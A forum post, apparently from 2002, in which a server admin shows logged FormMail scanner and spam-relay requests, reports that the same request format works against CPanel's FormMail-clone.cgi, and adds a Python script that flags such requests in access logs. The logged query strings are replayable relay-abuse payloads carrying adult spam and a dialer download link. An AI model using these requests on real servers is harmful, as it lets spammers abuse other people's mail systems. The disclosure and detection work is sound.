Hi all,
This belongs to "Backend/Scripts" but it is too serious to hide it there.
While studying the logs of the main account of my dedicated server, I noticed some kind of automated scanning for /cgi-bin/formmail.pl (I am referring to the old Analog reporting):
66: : Jan/13/02 10:19 AM: /cgi-bin/formmail.pl?email=&[email protected]&subject=P80+<my_ip_here>+35
54: : Nov/ 2/01 9:03 AM: /cgi-bin/[email protected]&[email protected]&subject=<domain_name_here>/cgi-bin/formmail.pl&msg=Hiya
35: : Jan/ 7/02 2:42 AM: /cgi-bin/[email protected]&subject=<another_domain_name_here>/cgi-bin/formmail.pl&[email protected]&msg=testing
30: : Oct/11/01 11:33 AM: /cgi-bin/[email protected]&[email protected]&subject=<some_other_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
28: : Oct/31/01 6:59 PM: /cgi-bin/[email protected]&[email protected]&subject=<yet_another_domain_name_here>/cgi-bin/formmail.pl&msg=scanning
and so on, and so on (hundreds of them).
Some of them directly try to send:
13: : Jan/ 1/02 1:47 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=Download The Napster Of Porn!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:26 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=FREE XXX PORN!&message=You+Have+Won+a+Free+Membership+To+Any+Of+The+Following+Sites:+++++++++++++++++++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Girl+Ranch++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Beaver+Palace++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Jungle+Girls+++++++++++++++++++++++++++++++++++++++++http://www.dazzled.com/freepornpics+-+Teen+Factory
13: : Jan/ 1/02 12:29 AM: /cgi-bin/[email protected]&[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected],[email protected]&subject=View My Webcam!&message=Want+instant+access+to+thousands+of+high+quality+adult+movies?++We've+got+celebrities,+lesbians,+hardcore,+fetish,+gay,+or+whatever+you+want.++You+don't+even+need+a+credit+card,+just+a+connection+to+the+internet.+http://209.202.218.10/dc/dialer+-+Click+here+to+download+the+napster+of+hardcore+entertainment!
I have then tried one of the last lines with /cgi-sys/FormMail-clone.cgi AND IT WORKS! The spam is being sent through my own server! So, it is a matter of weeks, maybe months, and the spammers WILL know that they just have to replace /cgi-bin/formmail.pl with /cgi-sys/FormMail-clone.cgi and they will be able to spam through any CPanel machine.
As far as I know, there is a more secure version of formmail, checking if the requesting document is stored on the server before proceeding with sending the email. Does anybody know for sure? Has anybody else noticed this kind of spam attack?
kosmo
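Added example, not part of kosmo's post: a log scan that separates the two request patterns shown above, scanner probes whose subject carries the tested script URL and single requests fanned out to many recipients. It assumes raw combined-format access-log lines (not Analog's decoded report), that `recipient` is the FormMail destination field, and that `webmaster@example.com` is the only address the site's own forms mail to; the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Script paths named in the post.
SCRIPT_RE = re.compile(r"/cgi-(?:bin|sys)/(?:formmail\.pl|FormMail-clone\.cgi)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: the only address this site's own forms legitimately mail to.
ALLOWED_RECIPIENTS = {"webmaster@example.com"}

def classify(request_uri):
    """Label a request URI: None if harmless, else the kind of abuse attempt."""
    parts = urlsplit(request_uri)
    if not SCRIPT_RE.fullmatch(parts.path):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    # "recipient" may hold a comma-separated list (assumed field name).
    recipients = {addr.strip().lower()
                  for value in params.get("recipient", [])
                  for addr in value.split(",") if addr.strip()}
    outside = recipients - ALLOWED_RECIPIENTS
    if not outside:
        return None
    subject = " ".join(params.get("subject", []))
    if SCRIPT_RE.search(subject):
        return "relay-probe"      # scanner tags the mail with the host it tested
    if len(outside) > 1:
        return "bulk-relay"       # one request fanned out to many addresses
    return "external-recipient"

def scan(log_lines):
    """Count findings per label over access-log lines."""
    findings = Counter()
    for line in log_lines:
        match = REQUEST_RE.search(line)
        label = classify(match.group(1)) if match else None
        if label:
            findings[label] += 1
    return findings

# Constructed sample lines (documentation addresses and hosts only).
SAMPLE = [
    '192.0.2.10 - - [13/Jan/2002:10:19:00 +0000] "GET /cgi-bin/formmail.pl?email=a%40example.net&recipient=collector%40example.org&subject=www.example.com/cgi-bin/formmail.pl&msg=scanning HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2002:01:47:00 +0000] "GET /cgi-sys/FormMail-clone.cgi?email=x%40example.net&recipient=a%40example.org,b%40example.org,c%40example.org&subject=hello&message=text HTTP/1.0" 200 512',
    '192.0.2.12 - - [02/Jan/2002:09:00:00 +0000] "GET /cgi-bin/formmail.pl?recipient=webmaster%40example.com&subject=Contact HTTP/1.0" 200 512',
    '192.0.2.13 - - [02/Jan/2002:09:01:00 +0000] "GET /index.html HTTP/1.0" 200 2048',
]

print(dict(scan(SAMPLE)))
```
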